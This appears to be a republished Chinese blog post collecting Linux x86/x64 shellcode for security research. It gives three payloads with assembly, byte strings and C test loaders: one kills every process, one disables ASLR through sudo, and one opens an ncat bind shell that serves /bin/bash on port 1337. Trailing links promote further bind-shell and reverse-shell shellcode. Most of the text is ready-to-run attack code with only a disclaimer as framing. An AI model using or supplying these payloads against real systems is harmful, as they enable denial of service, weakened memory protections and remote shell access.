[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)
Posted 鸿渐之翼
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)相关的知识,希望对你有一定的参考价值。
免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。
Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Google Dork: None
# Date: 2018-12-08
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 14
# Description: Linux/x86 kill 9 -1 (14 bytes)
------------------------------[Description]---------------------------------
This shellcode will kill all processes
-----------------------------[Shellcode Dump]---------------------------------
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: b0 25 mov $0x25,%al
8048065: bb ff ff ff ff mov $0xffffffff,%ebx
804806a: b1 09 mov $0x9,%cl
804806c: cd 80 int $0x80
-----------------------------[Compile]---------------------------------------------
gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
-----------------------------[C-Code]-----------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\\x31\\xc0\\x50\\xb0\\x25\\xbb\\xff\\xff\\xff\\xff\\xb1\\x09\\xcd\\x80";
main()
printf("Shellcode Length: %d\\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
Linux/x64 - 禁用 ASLR 安全 Shellcode(93 字节)
Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)
/*
ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []
Test:
run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"
Assembly:
global _start
section .ASLR
_start:
#6A3B push byte +0x3b
#58 pop eax
#99 cdq
#48 dec eax
#BB2F62696E mov ebx,0x6e69622f
#2F das
#7368 jnc 0x75
#005348 add [ebx+0x48],dl
#89E7 mov edi,esp
#682D630000 push dword 0x632d
#48 dec eax
#89E6 mov esi,esp
#52 push edx
#E836000000 call 0x56
#6563686F arpl [gs:eax+0x6f],bp
#2030 and [eax],dh
#207C2073 and [eax+0x73],bh
#7564 jnz 0x90
#6F outsd
#20746565 and [ebp+0x65],dh
#202F and [edi],ch
#7072 jo 0xa7
#6F outsd
#632F arpl [edi],bp
#7379 jnc 0xb3
#732F jnc 0x6b
#6B65726E imul esp,[ebp+0x72],byte +0x6e
#656C gs insb
#2F das
#7261 jc 0xa6
#6E outsb
#646F fs outsd
#6D insd
#697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
#7370 jnc 0xc2
#61 popa
#636500 arpl [ebp+0x0],sp
#56 push esi
#57 push edi
#48 dec eax
#89E6 mov esi,esp
#0F05 syscall
*/
#include <stdio.h>
#include <string.h>
unsigned char ASLR[] = \\
"\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x53"
"\\x48\\x89\\xe7\\x68\\x2d\\x63\\x00\\x00\\x48\\x89\\xe6\\x52\\xe8\\x36\\x00"
"\\x00\\x00\\x65\\x63\\x68\\x6f\\x20\\x30\\x20\\x7c\\x20\\x73\\x75\\x64\\x6f"
"\\x20\\x74\\x65\\x65\\x20\\x2f\\x70\\x72\\x6f\\x63\\x2f\\x73\\x79\\x73\\x2f"
"\\x6b\\x65\\x72\\x6e\\x65\\x6c\\x2f\\x72\\x61\\x6e\\x64\\x6f\\x6d\\x69\\x7a"
"\\x65\\x5f\\x76\\x61\\x5f\\x73\\x70\\x61\\x63\\x65\\x00\\x56\\x57\\x48\\x89"
"\\xe6\\x0f\\x05";
int main()
printf("Shellcode len: %d\\n", strlen(ASLR));
int (*ret)() = (int(*)())ASLR;
ret();
Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
/*
Linux/x86-execve(/usr/bin/ncat -lvp 1337 -e/bin/bash)+NULL-FREE Shellcode(95 bytes)
Author : T3jv1l
Contact: t3jv1l@gmail.com
Twitter:https://twitter.com/T3jv1l
Shellcode len : 119 bytes
Compilation: gcc shellcode.c -o shellcode
Compilation for x64 : gcc -m32 shellcode.c -o shellcode
Tested On: Ubuntu 16.04.5 LTS
Arch: x86
Size: 95 bytes
Thanks for helping NytroRST
############################################################################
global _start:
_start:
jmp short todo
shellcode:
xor eax, eax ;Zero out eax
xor ebx, ebx ;Zero out ebx
xor ecx, ecx ;Zero out ecx
cdq ;Zero out edx using the sign bit from eax
mov BYTE al, 0xa4 ;Setresuid syscall 164 (0xa4)
int 0x80 ;Syscall execute
pop esi ;Esi contain the string in db
xor eax, eax ;Zero out eax
mov[esi+13], al ;Null terminate /usr/bin/ncat
mov[esi+22], al ;Null terminate -lvp1337
mov[esi+34], al ;Null terminate -e/bin/bash
mov[esi+35], esi ;Store address of /usr/bin/ncat in AAAA
lea ebx, [esi+14] ;Load address of -lvp1337
mov[esi+39], ebx ;Store address of -lvp1337 in BBBB taken from ebx
lea ebx, [esi+23] ;Load address of -e/bin/bash into ebx
mov[esi+43], ebx ;Store address of -e/bin/bash in CCCC taken from ebx
mov[esi+47], eax ;Zero out DDDD
mov al, 11 ;11 is execve syscall number
mov ebx, esi ;Store address of /usr/bin/ncat
lea ecx, [esi+35] ;Load address of ptr to argv[] array
lea edx, [esi+47] ;envp[] NULL
int 0x80 ;Syscall execute
todo:
call shellcode
db '/usr/bin/ncat#-lvp1337#-e/bin/bash#AAAABBBBCCCCDDDD'
; 012345678901234567890123456789012345678901234567890
######################################################################################
ncat.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: eb 35 jmp 37 <todo>
00000002 <shellcode>:
2: 31 c0 xor %eax,%eax
4: 31 db xor %ebx,%ebx
6: 31 c9 xor %ecx,%ecx
8: 99 cltd
9: b0 a4 mov $0xa4,%al
b: cd 80 int $0x80
d: 5e pop %esi
e: 31 c0 xor %eax,%eax
10: 88 46 0d mov %al,0xd(%esi)
13: 88 46 16 mov %al,0x16(%esi)
16: 88 46 22 mov %al,0x22(%esi)
19: 89 76 23 mov %esi,0x23(%esi)
1c: 8d 5e 0e lea 0xe(%esi),%ebx
1f: 89 5e 27 mov %ebx,0x27(%esi)
22: 8d 5e 17 lea 0x17(%esi),%ebx
25: 89 5e 2b mov %ebx,0x2b(%esi)
28: 89 46 2f mov %eax,0x2f(%esi)
2b: b0 0b mov $0xb,%al
2d: 89 f3 mov %esi,%ebx
2f: 8d 4e 23 lea 0x23(%esi),%ecx
32: 8d 56 2f lea 0x2f(%esi),%edx
35: cd 80 int $0x80
00000037 <todo>:
37: e8 c6 ff ff ff call 2 <shellcode>
3c: 2f das
3d: 75 73 jne b2 <todo+0x7b>
3f: 72 2f jb 70 <todo+0x39>
41: 62 69 6e bound %ebp,0x6e(%ecx)
44: 2f das
45: 6e outsb %ds:(%esi),(%dx)
46: 63 61 74 arpl %sp,0x74(%ecx)
49: 23 2d 6c 76 70 31 and 0x3170766c,%ebp
4f: 33 33 xor (%ebx),%esi
51: 37 aaa
52: 23 2d 65 2f 62 69 and 0x69622f65,%ebp
58: 6e outsb %ds:(%esi),(%dx)
59: 2f das
5a: 62 61 73 bound %esp,0x73(%ecx)
5d: 68 23 41 41 41 push $0x41414123
62: 41 inc %ecx
63: 42 inc %edx
64: 42 inc %edx
65: 42 inc %edx
66: 42 inc %edx
67: 43 inc %ebx
68: 43 inc %ebx
69: 43 inc %ebx
6a: 43 inc %ebx
6b: 44 inc %esp
6c: 44 inc %esp
6d: 44 inc %esp
6e: 44 inc %esp
###################################################################################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
int (*shellcodetotest)();
char shellcode[] = "\\xeb\\x35\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x99\\xb0\\xa4\\xcd\\x80\\x5e\\x31\\xc0\\x88\\x46\\x0d\\x88\\x46\\x16\\x88\\x46\\x22\\x89\\x76\\x23\\x8d\\x5e\\x0e\\x89\\x5e\\x27\\x8d\\x5e\\x17\\x89\\x5e\\x2b\\x89\\x46\\x2f\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x23\\x8d\\x56\\x2f\\xcd\\x80\\xe8\\xc6\\xff\\xff\\xff\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x6e\\x63\\x61\\x74\\x23\\x2d\\x6c\\x76\\x70\\x31\\x33\\x33\\x37\\x23\\x2d\\x65\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x23";
int main(int argc, char **argv)
void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if(ptr == MAP_FAILED)
perror("mmap");
exit(-1);
printf("Shellcode Length: %d\\n", strlen(shellcode));
memcpy(ptr, shellcode, sizeof(shellcode));
shellcodetotest = ptr;
shellcodetotest();
return 0;
以上是关于[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)的主要内容,如果未能解决你的问题,请参考以下文章
[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)
[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)